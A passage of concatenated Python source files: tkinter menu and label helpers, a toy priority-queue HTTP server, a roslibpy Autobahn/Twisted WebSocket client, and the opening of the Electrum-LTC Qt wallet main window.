t_out.join(3)
t_err.join(3)
on_completion(proc, out_lines, err_lines)
return
tk._default_root.after(int(poll_delay * 1000), poll)
poll()
return proc
class MenuEx(tk.Menu):
def __init__(self, target):
self._testers = {}
super().__init__(
target, tearoff=False, postcommand=self.on_post, **get_style_configuration("Menu")
)
def on_post(self, *args):
self.update_item_availability()
def update_item_availability(self):
for i in range(self.index("end") + 1):
item_data = self.entryconfigure(i)
if "label" in item_data:
tester = self._testers.get(item_data["label"])
if tester and not tester():
self.entryconfigure(i, state=tk.DISABLED)
else:
self.entryconfigure(i, state=tk.NORMAL)
def add(self, itemType, cnf={}, **kw):
cnf = cnf or kw
tester = cnf.get("tester")
if "tester" in cnf:
del cnf["tester"]
super().add(itemType, cnf)
itemdata = self.entryconfigure(self.index("end"))
labeldata = itemdata.get("label")
if labeldata:
self._testers[labeldata] = tester
class TextMenu(MenuEx):
def __init__(self, target):
self.text = target
MenuEx.__init__(self, target)
self.add_basic_items()
self.add_extra_items()
def add_basic_items(self):
self.add_command(label=tr("Cut"), command=self.on_cut, tester=self.can_cut)
self.add_command(label=tr("Copy"), command=self.on_copy, tester=self.can_copy)
self.add_command(label=tr("Paste"), command=self.on_paste, tester=self.can_paste)
def add_extra_items(self):
self.add_separator()
self.add_command(label=tr("Select All"), command=self.on_select_all)
def on_cut(self):
self.text.event_generate("<<Cut>>")
def on_copy(self):
self.text.event_generate("<<Copy>>")
def on_paste(self):
self.text.event_generate("<<Paste>>")
def on_select_all(self):
self.text.event_generate("<<SelectAll>>")
def can_cut(self):
return self.get_selected_text() and not self.selection_is_read_only()
def can_copy(self):
return self.get_selected_text()
def can_paste(self):
return not self.selection_is_read_only()
def get_selected_text(self):
try:
return self.text.get("sel.first", "sel.last")
except TclError:
return ""
def selection_is_read_only(self):
if hasattr(self.text, "is_read_only"):
return self.text.is_read_only()
return False
def create_url_label(master, url, text=None):
import webbrowser
return create_action_label(master, text or url, lambda _: webbrowser.open(url))
def create_action_label(master, text, click_handler, **kw):
url_font = tkinter.font.nametofont("TkDefaultFont").copy()
url_font.configure(underline=1)
url_label = ttk.Label(
master, text=text, style="Url.TLabel", cursor=get_hyperlink_cursor(), font=url_font, **kw
)
url_label.bind("<Button-1>", click_handler)
return url_label
def get_size_option_name(window):
return "layout." + type(window).__name__ + "_size"
def get_default_theme():
if running_on_windows():
return "Windows"
elif running_on_rpi():
return "Raspberry Pi"
else:
return "Enhanced Clam"
def get_default_basic_theme():
if running_on_windows():
return "vista"
else:
return "clam"
EM_WIDTH = None
def ems_to_pixels(x):
global EM_WIDTH
if EM_WIDTH is None:
EM_WIDTH = tkinter.font.nametofont("TkDefaultFont").measure("m")
return int(EM_WIDTH * x)
_btn_padding = None
def set_text_if_different(widget, text) -> bool:
if widget["text"] != text:
widget["text"] = text
return True
else:
return False
def tr_btn(s):
"""Translates button caption, adds padding to make sure text fits"""
global _btn_padding
if _btn_padding is None:
_btn_padding = get_button_padding()
return _btn_padding + tr(s) + _btn_padding
def add_messagebox_parent_checker():
def wrap_with_parent_checker(original):
def wrapper(*args, **options):
_check_dialog_parent(options)
return original(*args, **options)
return wrapper
from tkinter import messagebox
for name in [
"showinfo",
"showwarning",
"showerror",
"askquestion",
"askokcancel",
"askyesno",
"askyesnocancel",
"askretrycancel",
]:
fun = getattr(messagebox, name)
setattr(messagebox, name, wrap_with_parent_checker(fun))
if __name__ == "__main__":
root = tk.Tk()
# server.py
import socket
import queue
import threading
import logging
import collections
import time
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
# Container for an HTTP Request
Request = collections.namedtuple('Request', [
'method',
'path',
'http_version',
'sock',
])
class HttpServerWithPriorities:
"""
HTTP Server that has different priorities based on the request.
This is a toy HTTP server with two queues, one high priority and one low priority. All requests go to
the low priority queue except requests to '/ping', which go to the high priority queue. Any thread looking
for a new request to process checks the high priority queue first, thus giving it priority. If
`num_high_priority_threads` is specified, a thread pool will be created to process only high priority requests.
"""
def __init__(self, sock=None, port=8081, host='0.0.0.0', num_threads=4, num_high_priority_threads=0, debug_queues=False):
"""
Constructor for HttpServerWithPriorities. Will create the socket and bind it (if a socket is not provided). Will
also create the threadpool specified. None of the threads will be started, call the `run()` method to start
the server.
:param sock: optionally specify the socket (if not specified, a new socket will be created).
:param port: port to bind the socket to (only relevant if a socket is not passed).
:param host: host to bind the socket to (only relevant if a socket is not passed).
:param num_threads: number of threads that will fulfill the HTTP Requests (should be greater than 0).
:param num_high_priority_threads: number of threads that will fulfill high priority HTTP Requests (can be zero).
:param debug_queues: True to create a monitor thread that reports on the status of the queues.
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
sock.listen()
        self._sock = sock
self._queues = {
'high': queue.Queue(),
'low': queue.Queue(),
}
self._cv = threading.Condition()
self.request_queue = queue.Queue()
self._threads = [threading.Thread(target=self._worker_target) for _ in range(num_threads)]
self._high_priority_threads = [threading.Thread(target=self._high_priority_target) for _ in range(num_high_priority_threads)]
self._queue_monitor = threading.Thread(target=self._monitor_queues) if debug_queues else None
self._running = True
def run(self):
"""
Starts the worker threads, the high priority threads and the queue monitor thread (if needed). Then starts
accepting connections.
:return: None
"""
logger.info('Starting %s worker threads', len(self._threads))
for t in self._threads:
t.start()
        logger.info('Starting %s high priority worker threads', len(self._high_priority_threads))
for t in self._high_priority_threads:
t.start()
if self._queue_monitor:
            self._queue_monitor.start()
while self._running:
logger.debug("Waiting for connection...")
(client_socket, address) = self._sock.accept()
logger.info("Connection from %s", address)
# Maybe add to a queue instead? Right now we're creating a thread per request to enqueue it.
threading.Thread(target=self._request_triage, args=(client_socket,)).start()
def clean(self):
"""
Stops all threads and closes the sockets.
:return: None
"""
logger.info("Stopping the server")
self._running = False
self._cv.acquire()
self._cv.notify_all()
self._cv.release()
logger.info("Waiting for threads to finish...")
for t in self._threads:
t.join()
for t in self._high_priority_threads:
t.join()
if self._queue_monitor:
self._queue_monitor.join()
logger.info("Closing socket")
self._sock.close()
def _worker_target(self):
"""
This is the target for the threadpool.
        Checks the queues when notified and handles the request, trying the high priority queue first.
:return: None
"""
while self._running:
self._cv.acquire()
while not self._something_in_queue():
if not self._running:
self._cv.release()
return
self._cv.wait()
logger.debug("_worker_target notified")
request = self._get_existing_request()
logger.info("worker thread dequeued request(%s)", request)
self._cv.release()
self._handle_request(request)
def _high_priority_target(self):
while self._running:
self._cv.acquire()
while not self._something_in_high_priority_queue():
if not self._running:
self._cv.release()
return
self._cv.notify() # we're swallowing a notify if we don't process a low priority request
self._cv.wait()
logger.debug("_high_priority_target notified")
request = self._get_existing_request() # should be guaranteed to be high priority
logger.info("High priority thread dequeued request(%s)", request)
self._cv.release()
self._handle_request(request)
def _handle_request(self, request):
"""
Depending on the request path will write a response body. If the request path is '/long', it will sleep to
emulate a request that takes a while and then will send the response. Also, closes the socket.
:param request: Request object.
:return: None
"""
body = b'Hello world'
if request.path == '/ping':
body = b'healthy'
elif request.path == '/long':
logger.debug("Sleeping for one second to simulate a long request")
time.sleep(1)
logger.debug('Woke up from thread.sleep')
body = b'Long long'
self._write_response(request, body)
request.sock.close()
def _monitor_queues(self):
"""
        Target for the queue_monitor thread. Checks the state of each queue and prints a debug message.
:return: None
"""
while self._running:
for priority in self._queues:
logger.debug("queues[%s].empty() = %s", priority, self._queues[priority].empty())
time.sleep(3)
def _get_existing_request(self):
"""
Gets an existing request from one of the queues. It will try to get the Request from the 'high' priority queue
first giving it priority. This should be called with a lock and being sure that one of the queues has one
request.
:return: Request the enqueued request.
"""
if not self._queues['high'].empty():
return self._queues['high'].get_nowait() # Should be guaranteed
return self._queues['low'].get_nowait()
def _something_in_high_priority_queue(self):
"""
Returns True if there is at least one Request in the 'high' priority queue. Must be called with the lock held.
:return: boolean
"""
return not self._queues['high'].empty()
def _something_in_queue(self):
"""
        Returns True if there is at least one Request in any of the queues. Must be called with the lock held.
        :return: boolean
"""
for key in self._queues:
if not self._queues[key].empty():
return True
return False
def _request_triage(self, client_socket):
"""
Get the request and enqueue it in the right queue.
        :return: None
"""
# might return None if there's an error
request = self._get_request(client_socket)
if request:
logger.info("request(%s)", request)
self._enqueue_request(request)
def _enqueue_request(self, request):
"""
Enqueues the request in the appropriate queue.
:param request: request to enqueue.
:return: None
"""
self._cv.acquire()
request_queue = self._get_request_queue(request)
request_queue.put(request)
self._cv.notify()
self._cv.release()
def _get_request_queue(self, request):
"""
Returns the request queue based on the priority that the request has.
:param request: request to enqueue.
:return: queue for the request.
"""
priority = self._get_request_priority(request)
logger.debug("%s has priority(%s)", request, priority)
return self._queues[priority]
def _get_request_priority(self, request):
"""
Returns the request priority depending on the request's path.
:param request: Request to get the priority from.
        :return: str 'high'/'low' depending on the priority of the request.
"""
if request.path == '/ping':
return 'high'
return 'low'
def _get_request(self, client_socket):
"""
Reads the first line of the HTTP request and returns a Request object. Returns None if there is an error reading
or parsing the request.
:param client_socket: socket to read the HTTP request from.
:return: Request or None if there is an error.
"""
logger.debug("Reading data")
data = b''
while True:
temp_data = client_socket.recv(1024)
if not temp_data:
break
data += temp_data
if b'\r\n' in data:
break
first_line = str(data.split(b'\r\n')[0], encoding='UTF-8')
try:
method, path, version = first_line.split()
return Request(method=method, path=path, http_version=version, sock=client_socket)
        except ValueError:
logger.error("First line seems to be wrong '%s'", first_line)
logger.info("Ignoring error and closing socket")
client_socket.close()
return None
def _write_response(self, request, body):
"""
Writes the response to a request.
:param request: request to write a response to.
:param body: body of the response in bytes.
:return: None
"""
client_socket = request.sock
        length = len(body) + 1  # +1 because the b"\n".join below leaves one extra newline before the body
response = b"\n".join([
b'HTTP/1.1 200 OK',
b'Connection: Close',
b'Content-Length: ' + bytes(str(length), encoding='UTF-8'),
b"\n",
body,
])
client_socket.send(response)
def main():
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('-H', '--host', required=False, default='0.0.0.0', help='host to bind the socket to.')
ap.add_argument('-p', '--port', required=False, type=int, default=8081, help='port to bind the socket to.')
ap.add_argument('-n', '--num-threads', required=False, type=int, default=4, help='number of worker threads that will be processing http requests')
ap.add_argument('-i', '--num-high-priority-threads', required=False, type=int, default=0, help='number of high priority threads that will be processing high priority http requests')
ap.add_argument('-d', '--debug-queues', required=False, action='store_true', help='activate an extra thread to report on status of queues')
args = vars(ap.parse_args())
logger.debug("Running with args %s", args)
server = HttpServerWithPriorities(**args)
try:
server.run()
except KeyboardInterrupt:
server.clean()
if __name__ == '__main__':
main()
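# A rough manual test sketch (assumes the server above is already listening on
# 127.0.0.1:8081); the response bodies come from _handle_request.
#
#     import socket
#
#     def fetch(path):
#         s = socket.create_connection(('127.0.0.1', 8081))
#         s.sendall(b'GET ' + path + b' HTTP/1.1\r\n\r\n')
#         data = s.recv(4096)
#         s.close()
#         return data
#
#     fetch(b'/ping')   # routed to the high priority queue -> body b'healthy'
#     fetch(b'/long')   # low priority, sleeps ~1 second    -> body b'Long long'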
|
comm_autobahn.py
|
from __future__ import print_function
import logging
import threading
from autobahn.twisted.websocket import WebSocketClientFactory
from autobahn.twisted.websocket import WebSocketClientProtocol
from autobahn.twisted.websocket import connectWS
from autobahn.websocket.util import create_url
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet import threads
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.python import log
from ..event_emitter import EventEmitterMixin
from . import RosBridgeProtocol
LOGGER = logging.getLogger('roslibpy')
class AutobahnRosBridgeProtocol(RosBridgeProtocol, WebSocketClientProtocol):
def __init__(self, *args, **kwargs):
super(AutobahnRosBridgeProtocol, self).__init__(*args, **kwargs)
def onConnect(self, response):
LOGGER.debug('Server connected: %s', response.peer)
def onOpen(self):
LOGGER.info('Connection to ROS MASTER ready.')
self._manual_disconnect = False
self.factory.ready(self)
def onMessage(self, payload, isBinary):
if isBinary:
raise NotImplementedError('Add support for binary messages')
try:
self.on_message(payload)
except Exception:
            LOGGER.exception('Exception on start_listening while trying to handle message received. ' +
                             'It could indicate a bug in user code on message handlers. Message skipped.')
def onClose(self, wasClean, code, reason):
LOGGER.info('WebSocket connection closed: Code=%s, Reason=%s', str(code), reason)
def send_message(self, payload):
return self.sendMessage(payload, isBinary=False, fragmentSize=None, sync=False, doNotCompress=False)
def send_close(self):
self._manual_disconnect = True
self.sendClose()
class AutobahnRosBridgeClientFactory(EventEmitterMixin, ReconnectingClientFactory, WebSocketClientFactory):
"""Factory to create instances of the ROS Bridge protocol built on top of Autobahn/Twisted."""
protocol = AutobahnRosBridgeProtocol
def __init__(self, *args, **kwargs):
super(AutobahnRosBridgeClientFactory, self).__init__(*args, **kwargs)
self._proto = None
self._manager = None
self.connector = None
self.setProtocolOptions(closeHandshakeTimeout=5)
def connect(self):
"""Establish WebSocket connection to the ROS server defined for this factory."""
self.connector = connectWS(self)
@property
def is_connected(self):
"""Indicate if the WebSocket connection is open or not.
Returns:
bool: True if WebSocket is connected, False otherwise.
"""
return self.connector and self.connector.state == 'connected'
def on_ready(self, callback):
if self._proto:
callback(self._proto)
else:
self.once('ready', callback)
def ready(self, proto):
self.resetDelay()
self._proto = proto
self.emit('ready', proto)
def startedConnecting(self, connector):
LOGGER.debug('Started to connect...')
def clientConnectionLost(self, connector, reason):
LOGGER.debug('Lost connection. Reason: %s', reason)
self.emit('close', self._proto)
if not self._proto or (self._proto and not self._proto._manual_disconnect):
ReconnectingClientFactory.clientConnectionLost(self, connector, reason)
self._proto = None
def clientConnectionFailed(self, connector, reason):
LOGGER.debug('Connection failed. Reason: %s', reason)
ReconnectingClientFactory.clientConnectionFailed(
self, connector, reason)
self._proto = None
@property
def manager(self):
"""Get an instance of the event loop manager for this factory."""
if not self._manager:
self._manager = TwistedEventLoopManager()
return self._manager
@classmethod
def create_url(cls, host, port=None, is_secure=False):
url = host if port is None else create_url(host, port, is_secure)
return url
@classmethod
def set_max_delay(cls, max_delay):
"""Set the maximum delay in seconds for reconnecting to rosbridge (3600 seconds by default).
Args:
max_delay: The new maximum delay, in seconds.
"""
LOGGER.debug('Updating max delay to {} seconds'.format(max_delay))
# See https://twistedmatrix.com/documents/19.10.0/api/twisted.internet.protocol.ReconnectingClientFactory.html
cls.maxDelay = max_delay
@classmethod
def set_initial_delay(cls, initial_delay):
"""Set the initial delay in seconds for reconnecting to rosbridge (1 second by default).
Args:
initial_delay: The new initial delay, in seconds.
"""
LOGGER.debug('Updating initial delay to {} seconds'.format(initial_delay))
# See https://twistedmatrix.com/documents/19.10.0/api/twisted.internet.protocol.ReconnectingClientFactory.html
cls.initialDelay = initial_delay
@classmethod
def set_max_retries(cls, max_retries):
"""Set the maximum number or connection retries when the rosbridge connection is lost (no limit by default).
Args:
max_retries: The new maximum number of retries.
"""
LOGGER.debug('Updating max retries to {}'.format(max_retries))
# See https://twistedmatrix.com/documents/19.10.0/api/twisted.internet.protocol.ReconnectingClientFactory.html
cls.maxRetries = max_retries
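    # Reconnection tuning sketch: the three classmethods above adjust the
    # ReconnectingClientFactory back-off before connect() is called
    # (the values are illustrative only).
    #
    #     AutobahnRosBridgeClientFactory.set_initial_delay(1)
    #     AutobahnRosBridgeClientFactory.set_max_delay(60)
    #     AutobahnRosBridgeClientFactory.set_max_retries(10)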
class TwistedEventLoopManager(object):
"""Manage the main event loop using Twisted reactor.
    Running the event loop as a Twisted application is a very opinionated
management strategy. Other communication layers use different
event loop handlers that might be more fitting for different
execution environments.
"""
def __init__(self):
self._log_observer = log.PythonLoggingObserver()
self._log_observer.start()
def run(self):
"""Kick-starts a non-blocking event loop.
This implementation starts the Twisted Reactor
on a separate thread to avoid blocking."""
if reactor.running:
return
self._thread = threading.Thread(target=reactor.run, args=(False,))
self._thread.daemon = True
self._thread.start()
def run_forever(self):
"""Kick-starts the main event loop of the ROS client.
This implementation relies on Twisted Reactors
to control the event loop."""
reactor.run()
def call_later(self, delay, callback):
"""Call the given function after a certain period of time has passed.
Args:
delay (:obj:`int`): Number of seconds to wait before invoking the callback.
callback (:obj:`callable`): Callable function to be invoked when the delay has elapsed.
"""
reactor.callLater(delay, callback)
def call_in_thread(self, callback):
"""Call the given function on a thread.
Args:
callback (:obj:`callable`): Callable function to be invoked in a thread.
"""
reactor.callInThread(callback)
def blocking_call_from_thread(self, callback, timeout):
"""Call the given function from a thread, and wait for the result synchronously
for as long as the timeout will allow.
Args:
callback: Callable function to be invoked from the thread.
timeout (:obj: int): Number of seconds to wait for the response before
raising an exception.
Returns:
The results from the callback, or a timeout exception.
"""
result_placeholder = defer.Deferred()
if timeout:
result_placeholder.addTimeout(timeout, reactor, onTimeoutCancel=self.raise_timeout_exception)
return threads.blockingCallFromThread(reactor, callback, result_placeholder)
def raise_timeout_exception(self, _result=None, _timeout=None):
"""Callback called on timeout.
Args:
            _result: Unused--required by Twisted.
            _timeout: Unused--required by Twisted.
Raises:
An exception.
"""
raise Exception('No service response received')
def get_inner_callback(self, result_placeholder):
"""Get the callback which, when called, provides result_placeholder with the result.
Args:
result_placeholder: (:obj: Deferred): Object in which to store the result.
Returns:
A callable which provides result_placeholder with the result in the case of success.
"""
def inner_callback(result):
result_placeholder.callback({'result': result})
return inner_callback
def get_inner_errback(self, result_placeholder):
"""Get the errback which, when called, provides result_placeholder with the error.
Args:
result_placeholder: (:obj: Deferred): Object in which to store the result.
Returns:
A callable which provides result_placeholder with the error in the case of failure.
"""
def inner_errback(error):
result_placeholder.callback({'exception': error})
return inner_errback
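    # A hedged sketch (hypothetical names) of how the Deferred plumbing above
    # fits together: the caller hands blocking_call_from_thread() a function
    # that receives the Deferred placeholder, wires success/failure into some
    # asynchronous call, and returns the placeholder so the reactor waits on it.
    #
    #     def call_service(result_placeholder):
    #         d = some_async_request()                    # assumed async API
    #         d.addCallback(manager.get_inner_callback(result_placeholder))
    #         d.addErrback(manager.get_inner_errback(result_placeholder))
    #         return result_placeholder
    #
    #     outcome = manager.blocking_call_from_thread(call_service, timeout=5)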
def terminate(self):
"""Signals the termination of the main event loop."""
if reactor.running:
reactor.stop()
self._log_observer.stop()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_ltc.util import bh2u, bfh
from electrum_ltc import keystore, simple_config
from electrum_ltc.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants
from electrum_ltc.plugins import run_hook
from electrum_ltc.i18n import _
from electrum_ltc.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates)
from electrum_ltc import Transaction
from electrum_ltc import util, bitcoin, commands, coinchooser
from electrum_ltc import paymentrequest
from electrum_ltc.wallet import Multisig_Wallet
try:
from electrum_ltc.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_ltc.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-ltc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
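            # Illustrative counter-example (not used): registering something like
            #     self.network.register_callback(lambda *a: self.on_network(*a), interests)
            # would capture "self" in a closure held by the network and keep
            # this window alive after it is closed.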
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-LTC Testnet" if NetworkConstants.TESTNET else "Electrum-LTC"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend litecoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request litecoins to be sent to this wallet.")
])
